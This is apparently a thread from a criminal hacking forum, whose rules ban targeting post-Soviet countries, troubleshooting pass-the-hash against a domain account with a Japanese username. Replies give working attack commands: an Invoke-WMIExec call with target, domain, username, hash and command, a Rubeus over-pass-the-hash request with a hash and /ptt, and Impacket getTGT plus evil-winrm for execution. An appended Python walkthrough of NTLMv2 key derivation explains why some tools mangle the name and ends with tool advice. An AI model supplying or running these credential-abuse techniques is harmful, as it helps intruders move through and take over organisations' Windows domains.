
PTH without eng words

Before we proceed, please confirm that the username in question does not contain Cyrillic characters.
Note that work targeting post-Soviet countries is considered forbidden on this forum and may and will result in sanctions under our rules.

Have you tried using the SID instead of the username?
psgetsid.exe "username" (or use wmic)

Then, with the SID, you can find out the SAM account name (ASCII) that can be inserted into mimikatz.

Another approach would be using Invoke-WMIExec, as it supports Unicode better (so do Impacket psexec/smbexec).

Code:
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target 192.168.1.100 -Domain COMPANY -Username "中文用户" -Hash 00000000000000000000000000000000 -Command "cmd.exe /c whoami"
 
Hi, thanks for your reply. No, this username is Japanese and it is in the DC, but kiwi cannot read it.
 
Consider the over-pass-the-hash technique via Rubeus. This way you request a Kerberos TGT using the NTLM hash and can then do pass-the-ticket (PTT).
Code:
Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt

If attacking from Linux, you can use Impacket's getTGT.py script to request a ticket via NTLM, then PTT via evil-winrm for execution.
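Added example, not from any post in this thread: why a Unicode-aware tool (Invoke-WMIExec, Impacket) can pass a hash for a Japanese username while a tool that pushes the name through an ANSI codepage cannot. Under NTLMv2 (MS-NLMP) the per-user key is NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(Uppercase(user) || domain)), so the exact Unicode bytes of the username are part of the key derivation, and a mangled name ("????") yields a different key and a rejected NTProofStr even though the NT hash itself is correct. The Japanese account name, the NT hash used for it (the well-known empty-password hash) and the codepages are constructed for illustration; the known-answer values are the ones published in MS-NLMP section 4.2.4.

```python
import hashlib
import hmac
import struct

# NTLMv2 key derivation and response as specified in MS-NLMP. Every name goes
# into the KDF as UTF-16LE, so the bytes of a non-ASCII username matter.


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UNICODE(Uppercase(user) || domain)).
    Only the username is uppercased; the domain is used exactly as supplied."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR: AvId, AvLen (bytes), UTF-16LE value."""
    data = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


def target_info(nb_domain: str, nb_server: str) -> bytes:
    """Minimal AV_PAIR list: MsvAvNbDomainName(2), MsvAvNbComputerName(1), MsvAvEOL(0)."""
    return av_pair(2, nb_domain) + av_pair(1, nb_server) + struct.pack("<HH", 0, 0)


def ntlmv2_proof(ntowf2: bytes, server_challenge: bytes, client_challenge: bytes,
                 timestamp: int, tinfo: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    temp = (b"\x01\x01" + b"\x00" * 6          # RespType, HiRespType, reserved
            + struct.pack("<Q", timestamp)     # FILETIME, little-endian
            + client_challenge                 # 8 random bytes from the client
            + b"\x00" * 4                      # reserved
            + tinfo                            # AV_PAIR list copied from the CHALLENGE message
            + b"\x00" * 4)                     # reserved
    return hmac.new(ntowf2, server_challenge + temp, hashlib.md5).digest()


def mangle_username(user: str, codepage: str) -> str:
    """Simulate a non-Unicode-aware tool: round-trip the name through an ANSI codepage.
    Characters the codepage cannot represent become '?'."""
    return user.encode(codepage, errors="replace").decode(codepage)


# Known-answer values from MS-NLMP 4.2.4 (user "User", domain "Domain", password "Password").
SPEC_NT_HASH = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")
SPEC_SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
SPEC_CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")


def spec_vector() -> dict:
    """Recompute the spec's NTOWFv2 and NTProofStr to confirm the implementation."""
    key = ntowf_v2(SPEC_NT_HASH, "User", "Domain")
    proof = ntlmv2_proof(key, SPEC_SERVER_CHALLENGE, SPEC_CLIENT_CHALLENGE, 0,
                         target_info("Domain", "Server"))
    return {"ntowf_v2": key.hex(), "nt_proof_str": proof.hex()}


# Constructed (hypothetical) account: a Japanese SAM name and the NT hash of the
# empty password, used here only so the example runs offline. Not a real credential.
DEMO_NT_HASH = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")
DEMO_USER = "山田太郎"
DEMO_DOMAIN = "COMPANY"


def compare_keys(user: str, codepage: str) -> dict:
    """Key the DC derives from the real UTF-16LE SAM name vs. the key a tool derives
    after mangling the name through the given codepage."""
    expected = ntowf_v2(DEMO_NT_HASH, user, DEMO_DOMAIN)
    mangled = mangle_username(user, codepage)
    actual = ntowf_v2(DEMO_NT_HASH, mangled, DEMO_DOMAIN)
    return {"mangled_name": mangled, "keys_match": expected == actual}


if __name__ == "__main__":
    print(spec_vector())
    print(compare_keys(DEMO_USER, "cp1252"))  # Western ANSI codepage: name becomes "????"
    print(compare_keys(DEMO_USER, "cp932"))   # Japanese ANSI codepage: name survives
```

The practical reading: the hash you dumped is fine; what breaks is the username on its way into the key derivation. Use a tool that keeps the name as UTF-16LE end to end (or resolve the SID to the exact SAM name and paste that), and for Kerberos the same caution applies to the principal name in the AS-REQ, which is why over-pass-the-hash with Rubeus is a clean way around the problem.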
 

